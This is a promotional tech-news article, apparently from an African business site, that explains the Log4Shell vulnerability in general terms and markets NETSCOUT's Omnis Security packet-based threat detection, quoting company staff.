On 09 December 2021, the world was alerted to the Log4j vulnerability [CVE-2021-44228 aka Log4Shell]. It is likely that threat actors already knew about the vulnerability before this date, says Tom Bienkowski, NETSCOUT Product Marketing Director, because it’s been reported that the vulnerability had been exposed much earlier in Minecraft chat forums.

How does Log4j work – and what lessons does it bring?

Log4j, which is open-source software provided by the Apache Software Foundation, records errors and routine system operations and sends diagnostic messages about them to system administrators and users. A common example of Log4j is when a user types in or clicks on a bad weblink and they receive a 404 error message. The web server running the domain of the attempted weblink sends a message to say that the website doesn’t exist, and it also records that event in a log for the server’s system administrators using Log4j. In Minecraft, Log4j is used by the server to log activity as total memory used and user commands typed into the console.

Log4Shell works by abusing a feature in Log4j that allows users to specify custom code for formatting a log message. However, unfortunately, this kind of code allows third-party servers to submit software code that can perform all kinds of actions on the targeted computer. This opens the door for threat actors to steal sensitive information and send malicious content to other users communicating with the affected server.

“This vulnerability alerts us to the fact that it is time to start paying attention to packet-based investigations of exploitation,” says Risna Steenkamp, Vendor Alliance Manager for NETSCOUT and Infoblox at Exclusive Networks Africa. “The issue with the Log4j vulnerability was that it could be exploited to download and execute common crypto-mining malware, web shells, Cobalt Strike beacons – and undoubtedly ransomware.”

Bienkowski notes that: “Scanning and patching your vulnerable servers (if you can find them all) is absolutely the best defence against this exploit. But that takes time – a lot of time.  Therefore, it should be assumed that before or during this time, bad actors have already compromised one or more of your vulnerable servers.”

He, therefore, advocates considering the use of packet-based threat detection and investigation as one of the possible tools to detect and remediate the exploitation of such a vulnerability – an area where NETSCOUT undoubtedly excels.

The visibility challenge

Steenkamp continues: “In today’s complex networking world – which encompasses legacy networks, branch offices, work-from-home situations and public and private clouds – gaining the proper level of network visibility is more challenging than ever. The threat surface is expanding, and the number of security tools has increased, giving rise to siloed data. Putting this all together, it means that a lack of comprehensive and consistent network visibility makes it harder for cybersecurity teams to conduct expedient and effective threat detection and response.

“In addition, when new technologies are implemented rapidly to meet business needs, this often means that security is compromised. This approach can limit visibility and cause security blind spots, which are attractive to threat agents. How do you protect yourself from threats that you can’t see?”

NETSCOUT digs deep into the visibility challenge

NETSCOUT’s solution to this challenge is Omnis™ Security, a platform for advanced threat analytics and response, which provides comprehensive and consistent network visibility for effective cybersecurity.

NETSCOUT’s patented Smart Data technology provides unequalled visibility by uniquely converting network packets into an intelligent source of data. NETSCOUT has now incorporated that same technology into a cybersecurity solution that offers comprehensive network visibility and more efficient cyber threat detection and response.

About Omnis Security from NETSCOUT

Unlike security information and event management solutions (SIEMs), endpoint detection and response (EDR), or user behaviour analytics (UBA) security technologies, Omnis Security transforms packet data into real-time threat awareness indicators. It empowers your team with relevant contextual data, allowing for swift, decisive action, smarter investigation, and faster, more accurate remediation, as follows:

  • You can identify the deep attack context and quickly assess the extent of the breach to isolate the risk.
  • You are able to remediate more quickly and accurately than using only non-network traffic data sources.
  • Vital forensic reports are created, for law enforcement and support reporting obligations according to legislation.

“In the event of a malware attack,” says Steenkamp, “NETSCOUT Omnis security offers deep visibility into network traffic, including packet-level visibility that can also automatically create a robust set of metadata that gives you visibility into all seven layers of the OSI model, and for many different protocols.

“Omnis further provides the ability to continuously capture and store this robust set of packet-based metadata for real-time and retrospective analysis. Additionally, Omnis infuses this packet-based data with multiple sources of threat intelligence, to automatically detect and conduct analysis of this data, as well as the ability to conduct high performing decryption.

“While it is true that you can’t protect yourself against a danger that you cannot see, it is also true that in the networking security environment, NETSCOUT is uniquely qualified to be your eyes,” she concludes.

NETSCOUT is distributed throughout Sub-Saharan Africa by Exclusive Networks Africa.

By Staff Writer.

Sign Up for Our Newsletters

Get notified of the best deals on our WordPress themes.

You May Also Like

UBA & Cellulant Join Forces to Unite Africa’s Payments Ecosystem

Nigeria’s United Bank for Africa (UBA), and Cellulant, a leading Pan-African payments company, have announced a partnership that will extend payment services for merchants and consumers across 19 key African…
View Post

Vodacom & Accenture Join Forces for Bespoke Cybersecurity

South African telco Vodacom and Ireland-based IT services company Accenture have partnered to launch Vodacom Managed Security services through Vodacom Business. The partnership was publically announced yesterday via press release.…
View Post

South Africa’s Dis-Chem Takes a Swing at WhatsApp Commerce

Clickatell, a CPaaS innovator and Chat Commerce leader, has been selected by leading South African retailer, Dis-Chem Pharmacies, to enable WhatsApp as its customer communication channel to engage with its…
View Post

TymeBank Launches Medical Insurance App for South Africans

TymeBank, the South Africa-based exclusively digital retail bank, has announced a new partnership with National HealthCare for affordable medical insurance to consumers, through the launch of TymeHealth, an app-based offering…
View Post

Nokia Kenya Dodges a $260,000 Fine in Service Centre Contract Feud

A Kenyan court has reportedly rejected a petition filed by Kenyan dealer TechnoService which is seeking Sh150-million ($257,832.60) from cellphone manufacturer Nokia for allegedly selling some of its businesses to…
View Post

Standard Bank Boosts its Shari’ah Banking with AWS Technology

On Thursday, Standard Bank South Africa, which offers a range of Shari’ah-compliant banking solutions, announced the introduction of a dedicated call centre line for its Shari’ah banking customers. Asma Latiff,…
View Post